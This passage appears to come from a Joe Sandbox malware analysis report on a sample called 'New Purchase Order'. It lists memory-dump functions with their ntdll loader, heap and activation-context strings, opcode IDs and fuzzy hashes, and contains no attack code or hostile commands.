                                                          • Instruction Fuzzy Hash: 63425BB1900715DFDB61DF68C880BAAB7F5BF04314F1445A9E989EB342E770AA84CF61
                                                          Function 0184A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          • Opcode ID: 210e2f860ef08feb98857bf811d3d85a26882f6ac23cb09bdfa3cb53d8a6d001
                                                          • Instruction ID: 1667c4f0a681dc0740704b69f26d870a3def0b4e9bd5a5d10fee104e4015f822
                                                          • Opcode Fuzzy Hash: 210e2f860ef08feb98857bf811d3d85a26882f6ac23cb09bdfa3cb53d8a6d001
                                                          • Instruction Fuzzy Hash: C4C17D7514838A8FE729CF58C144B6AB7E4FF84708F044969F996CB251EB38CB45CB92
                                                          Function 01878402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializeProcess, xrefs: 01878422
                                                          • @, xrefs: 01878591
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01878421
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0187855E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          • Opcode ID: 8ac45e106c7522669bdd8ef069f5d510c88aac6ee6ae85887b24a5c98a6b6a2c
                                                          • Instruction ID: 211b916771d5517e6920afe1d75621c0b877b96fc173a1cbdc6000c0786f3ff8
                                                          • Opcode Fuzzy Hash: 8ac45e106c7522669bdd8ef069f5d510c88aac6ee6ae85887b24a5c98a6b6a2c
                                                          • Instruction Fuzzy Hash: F1917872548345AFD721EF29C884EABBAECBB85744F40092EFA84D2151E774DB44CB63
                                                          Function 0187273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018B22B6
                                                          • SXS: %s() passed the empty activation context, xrefs: 018B21DE
                                                          • .Local, xrefs: 018728D8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018B21D9, 018B22B1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          • Opcode ID: 6b03454a40ba39d44c28bda8591bfd06f58df5ef2c45a529889cc467b4e011c2
                                                          • Instruction ID: 0699ac5f4fbbadbb40ef7e245119ef3f7ecbfd466f67fdf5a038464da948278c
                                                          • Opcode Fuzzy Hash: 6b03454a40ba39d44c28bda8591bfd06f58df5ef2c45a529889cc467b4e011c2
                                                          • Instruction Fuzzy Hash: C5A19E3190022A9BDB25CF68C884BA9B7B6BF58358F1941E9D908E7351D730EF81CF91
                                                          Function 01874AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 018B342A
                                                          • RtlDeactivateActivationContext, xrefs: 018B3425, 018B3432, 018B3451
                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 018B3437
                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 018B3456
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                          • API String ID: 0-1245972979
                                                          • Opcode ID: 474fa7e3c143c09cf4a9208a1f932efda3668843ef2436331c5a364c1543f741
                                                          • Instruction ID: bc10230bd76207ee4050c9ede50f53cca576438630c5f234022e2857693ea709
                                                          • Opcode Fuzzy Hash: 474fa7e3c143c09cf4a9208a1f932efda3668843ef2436331c5a364c1543f741
                                                          • Instruction Fuzzy Hash: 0B610F36640B129BD722CE1CC8C1B7AB7E5EFA0B50F148529ED55DB340DB38EA41CB91
                                                          Function 018464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 018A0FE5
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018A10AE
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 018A106B
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 018A1028
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          • Opcode ID: f7089f3d8d1ea83828ab820cfae2ae396fe38d779d5157fd86eb43c128a15909
                                                          • Instruction ID: fa0e593a85f8dc2805a8a05d952b0b673684a102201a9eae1d3dee9776f45e25
                                                          • Opcode Fuzzy Hash: f7089f3d8d1ea83828ab820cfae2ae396fe38d779d5157fd86eb43c128a15909
                                                          • Instruction Fuzzy Hash: AD71F1B19043099FDB21EF18C884B977BA8AF96754F540468F948CB246E734D788CBD2
                                                          Function 0186245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • apphelp.dll, xrefs: 01862462
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 018AA9A2
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 018AA992
                                                          • LdrpDynamicShimModule, xrefs: 018AA998
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          • Opcode ID: 7b3b16e70cf282a7ad9f1af0d93f8d11e31f5080a783cce49564594b9ae7bd04
                                                          • Instruction ID: 46bd1757808e65e03b9f01389df96868ba8e82d6cb9204b86702f39dd8533aaa
                                                          • Opcode Fuzzy Hash: 7b3b16e70cf282a7ad9f1af0d93f8d11e31f5080a783cce49564594b9ae7bd04
                                                          • Instruction Fuzzy Hash: E5319C71A40202EBEB35DF5DD880EBA77F9FB84B04F550059E911EB245C7B4AB81C781
                                                          Function 018529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HEAP[%wZ]: , xrefs: 01853255
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0185327D
                                                          • HEAP: , xrefs: 01853264
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          • Opcode ID: 461a24888b20f52c7ee56c0e13c0805b43373e520ad88a27a355095007cd0116
                                                          • Instruction ID: 6298a9406f1834acb802575467b7474bdb021a21554a71b31950ccc5bd12609c
                                                          • Opcode Fuzzy Hash: 461a24888b20f52c7ee56c0e13c0805b43373e520ad88a27a355095007cd0116
                                                          • Instruction Fuzzy Hash: C4929971A04649DFDB66CFA8C4407AEBBF2FF48344F188099EC49EB252D734AA45CB50
                                                          Function 01850770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          • Opcode ID: 6146992dd3111bd3a638973bb0a5a41a9fd2541944ec204f3e676d549f2fa53a
                                                          • Instruction ID: 0e5dd3f99f9f2071f215289ca3e2a082ef297ff88c10f1fb9b081646332b9e9e
                                                          • Opcode Fuzzy Hash: 6146992dd3111bd3a638973bb0a5a41a9fd2541944ec204f3e676d549f2fa53a
                                                          • Instruction Fuzzy Hash: 7FF18A70A00606DFEB66CF68C894B6ABBF5FF44704F148168E916DB385D734EA81CB91
                                                          Function 01866962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $@
                                                          • API String ID: 0-1077428164
                                                          • Opcode ID: e645c84ca2c9198480965981bb43d47cefe5ff922a8033ce58f017095bc959d1
                                                          • Instruction ID: 4a1221de6f9149b5564aab30f24f7bae2b467bf83ecaddbd2abbf349affba4e9
                                                          • Opcode Fuzzy Hash: e645c84ca2c9198480965981bb43d47cefe5ff922a8033ce58f017095bc959d1
                                                          • Instruction Fuzzy Hash: 5EC295716083459FE725CF28C841BABBBE9BF88758F04892DF989C7241D734DA45CB92
                                                          Function 0183A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          • Opcode ID: 63a505bb4c5572acb99d4c040b65155a3990ec07972c1816db74c2d91cfd1a08
                                                          • Instruction ID: 4b21e7794c6d0be067445226fd3af345fd5ce9d92b64facb834a7db3cc361359
                                                          • Opcode Fuzzy Hash: 63a505bb4c5572acb99d4c040b65155a3990ec07972c1816db74c2d91cfd1a08
                                                          • Instruction Fuzzy Hash: 12A159719116299BDF219F68CC88BAAB7B8EF48700F1401E9E909E7251D7369F84CF91
                                                          Function 01860BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpCheckModule, xrefs: 018AA117
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 018AA121
                                                          • Failed to allocated memory for shimmed module list, xrefs: 018AA10F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          • Opcode ID: 26d48ae3c29fa2b66f86a8e90684e245b8b6ac9a91010175fafa925abb3fbde5
                                                          • Instruction ID: 5bc0f2df5e86f7254e2b2c1aa41fb45d02d7626bbc1d6d51920781f39c4e4fcd
                                                          • Opcode Fuzzy Hash: 26d48ae3c29fa2b66f86a8e90684e245b8b6ac9a91010175fafa925abb3fbde5
                                                          • Instruction Fuzzy Hash: 3471BD70A00205EFDB29DF6CC980AAEB7B8FB88704F144469E902EB655E734AF41CB55
                                                          Function 01850A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          • Opcode ID: 80b791d239aea365271032e37276db29a543076dcf0d38259538f4c9c2a50a65
                                                          • Instruction ID: 03a96471ecf05cce83eb2e221df2d17c03bf0e2685dfb91289806061fc24c322
                                                          • Opcode Fuzzy Hash: 80b791d239aea365271032e37276db29a543076dcf0d38259538f4c9c2a50a65
                                                          • Instruction Fuzzy Hash: D861AF71600305DFEB69DF28C481B6ABBE1FF85708F148559F859CB292D770EA81CB92
                                                          Function 0187C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 018B82DE
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 018B82E8
                                                          • Failed to reallocate the system dirs string !, xrefs: 018B82D7
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          • Opcode ID: a6ef9d5b08a907e759bd0eb450ac14b1e9cf86f6131a59383749e712580e7065
                                                          • Instruction ID: 17ce9030f3f08f853a89e550b490fe9866e1bc106beb4542241960690e342703
                                                          • Opcode Fuzzy Hash: a6ef9d5b08a907e759bd0eb450ac14b1e9cf86f6131a59383749e712580e7065
                                                          • Instruction Fuzzy Hash: CB411571548302ABC721EB6CD880B5BB7E8EF45794F00492AF949D3254EB74DA00CB92
                                                          Function 018FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • @, xrefs: 018FC1F1
                                                          • PreferredUILanguages, xrefs: 018FC212
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018FC1C5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          • Opcode ID: 91f1642d84e79d351b57485609e45054269652fc35e0952f2eb5f14095555b7f
                                                          • Instruction ID: d2310b3581c4257d1d49deedb90ef5fdcf663643aebc7f44f16a7c530eee6181
                                                          • Opcode Fuzzy Hash: 91f1642d84e79d351b57485609e45054269652fc35e0952f2eb5f14095555b7f
                                                          • Instruction Fuzzy Hash: C3416F76E0020EEBDB11DAD8C881FEEBBB8EB14704F14416AEA09E7240D7749B44CB91
                                                          Function 018D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          • Opcode ID: 1a57e717adda1ffde3ee10e3d49291791dd8f7edbc1711bdb1450059d083295a
                                                          • Instruction ID: f45d04f1cbed7ec9d5118f59638e611956be36226404d6e511ead62391a70950
                                                          • Opcode Fuzzy Hash: 1a57e717adda1ffde3ee10e3d49291791dd8f7edbc1711bdb1450059d083295a
                                                          • Instruction Fuzzy Hash: AA411232A007598BEB26DBE9C844BADBBB9FF55344F14045ADE01EBB81DB348B01CB51
                                                          Function 018C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 018C4899
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018C4888
                                                          • LdrpCheckRedirection, xrefs: 018C488F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          • Opcode ID: 3e429ec169b707696f4e8b83f4c96daf3abef6e2f5d2efba2c523d11b2f48b6b
                                                          • Instruction ID: f0081036745e6da463cddea622e6cf04c7d881b3664d1645cd246eab198018cc
                                                          • Opcode Fuzzy Hash: 3e429ec169b707696f4e8b83f4c96daf3abef6e2f5d2efba2c523d11b2f48b6b
                                                          • Instruction Fuzzy Hash: F941AF32A047559FCB22CE6CD860A27BBE4EF89F50B05056DED49D7315D731DA80CB91
                                                          Function 01850BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-2558761708
                                                          • Opcode ID: 9eadcbf9c4b219ff524ddcdb1cbfb67c5091e67705cf2474dd2b27e597b24142
                                                          • Instruction ID: 6c8be249c84934966936da0a1237394d4e43c5ab3389be807ef903c98662e5ed
                                                          • Opcode Fuzzy Hash: 9eadcbf9c4b219ff524ddcdb1cbfb67c5091e67705cf2474dd2b27e597b24142
                                                          • Instruction Fuzzy Hash: B91106723161059FE759DA18C4C1B75B3A5EF80719F198159F806CB351D734DA81C792
                                                          Function 018C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Process initialization failed with status 0x%08lx, xrefs: 018C20F3
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 018C2104
                                                          • LdrpInitializationFailure, xrefs: 018C20FA
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          • Opcode ID: eb382f47edfe1cd3d8e482a63c5979a76b9d738bd5eef7a8c6b5e146a0bd7d8a
                                                          • Instruction ID: 175e05feedc1abd7c07692eefe2dad42c5ebcaa7cdb68ce83d8bbb01468f490a
                                                          • Opcode Fuzzy Hash: eb382f47edfe1cd3d8e482a63c5979a76b9d738bd5eef7a8c6b5e146a0bd7d8a
                                                          • Instruction Fuzzy Hash: 7BF0A439640718ABE625EA4C8C46F953769EB41F54F500069F640E7285D2F4E7408652
                                                          Function 018503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          • Opcode ID: 5e0abcc2b7f041e2db5e20206ef7ed478691078743f7dd8d954667eae5d1fd82
                                                          • Instruction ID: 392245bd4fc6f9107fcda0ed5ebd04cd0346e9732a44693e95fdefeca893aad1
                                                          • Opcode Fuzzy Hash: 5e0abcc2b7f041e2db5e20206ef7ed478691078743f7dd8d954667eae5d1fd82
                                                          • Instruction Fuzzy Hash: 00712A71A0014A9FDF01DFA8C990BAEBBF8FF18744F154065E905E7251EA74EE41CBA1
                                                          Function 0184A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrResSearchResource Enter, xrefs: 0184AA13
                                                          • LdrResSearchResource Exit, xrefs: 0184AA25
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          • API String ID: 0-4066393604
                                                          • Opcode ID: 71769a382247177952bc7c6a250f52d495b5c5f234f643758fdc70481ffcbb0a
                                                          • Instruction ID: 69a864489c6b579b9778769feeecaed501f96bcc2323670fbfd3bf7219c942ae
                                                          • Opcode Fuzzy Hash: 71769a382247177952bc7c6a250f52d495b5c5f234f643758fdc70481ffcbb0a
                                                          • Instruction Fuzzy Hash: E1E17371A4061D9FEB25CE9DC980BAEBBBAFF44354F144429E902EB251DB349B40CB51
                                                          Function 0190A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction ID: e3ceca87d8b61a89178df8a1329139f4be605d82eb309d31253725371b61a996
                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction Fuzzy Hash: 3DC1BF312043429FE726CE28C841B6BBBE9AFD4719F044A2CF69ACB2D1D775D545CB82
                                                          Function 018BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: d44e1082e5dce23f08debfce05c043aba3d08f81155f2e65b03cfea4c52a849b
                                                          • Instruction ID: 5acfeaa6f5013f40090bccf9ace0bd895a24dc87a715f15819ab2778836d102b
                                                          • Opcode Fuzzy Hash: d44e1082e5dce23f08debfce05c043aba3d08f81155f2e65b03cfea4c52a849b
                                                          • Instruction Fuzzy Hash: F2614C71E006199FDB25DFA8C980BEEBBB5FB48704F14806DE659EB351D731AA40CB50
                                                          Function 018E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MUI
                                                          • API String ID: 0-17815947
                                                          • Opcode ID: 6f085577261dd3bacc940db39a0e3874287a4a33d29c4d7599c3642285825e10
                                                          • Instruction ID: 204872e8fc4def3dd05ba876d3cb97ffcda96309d1ba0543c1e4c8bf96437aa0
                                                          • Opcode Fuzzy Hash: 6f085577261dd3bacc940db39a0e3874287a4a33d29c4d7599c3642285825e10
                                                          • Instruction Fuzzy Hash: 4051F771E0121EAFDB11DFA9CC84AEEBBF9EB45754F100529EA15F7290D6309A05CB60
                                                          Function 018404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0184063D
                                                          • kLsE, xrefs: 01840540
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 0-2547482624
                                                          • Opcode ID: 1cb0102b5545850ccdad7511ce0992e43a19df8bc588ad30f51d35c280353f2e
                                                          • Instruction ID: 2393efc8122f2c049fa9d39a2637ec1d4dad2dd0773e0cb97cf5563bde09564c
                                                          • Opcode Fuzzy Hash: 1cb0102b5545850ccdad7511ce0992e43a19df8bc588ad30f51d35c280353f2e
                                                          • Instruction Fuzzy Hash: B0519C7150474A9BD724EF68C5406E7BBE8AF84304F10883EFAEAC7241EB74D645CB92
                                                          Function 0184A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0184A2FB
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0184A309
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          • API String ID: 0-2876891731
                                                          • Opcode ID: f3e05f07e3671718129d0e13a9b908362ca3179f2cbd5a340bed86be153ccb41
                                                          • Instruction ID: f587120a34f7867b5772732b8866421255a593b00b800bd7691eefceeee0af5c
                                                          • Opcode Fuzzy Hash: f3e05f07e3671718129d0e13a9b908362ca3179f2cbd5a340bed86be153ccb41
                                                          • Instruction Fuzzy Hash: 8941CD31A40649CBEB29CF6DC840B6ABBB5FF85704F1440A9E902DF291EBB5DB01CB41
                                                          Function 0187A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
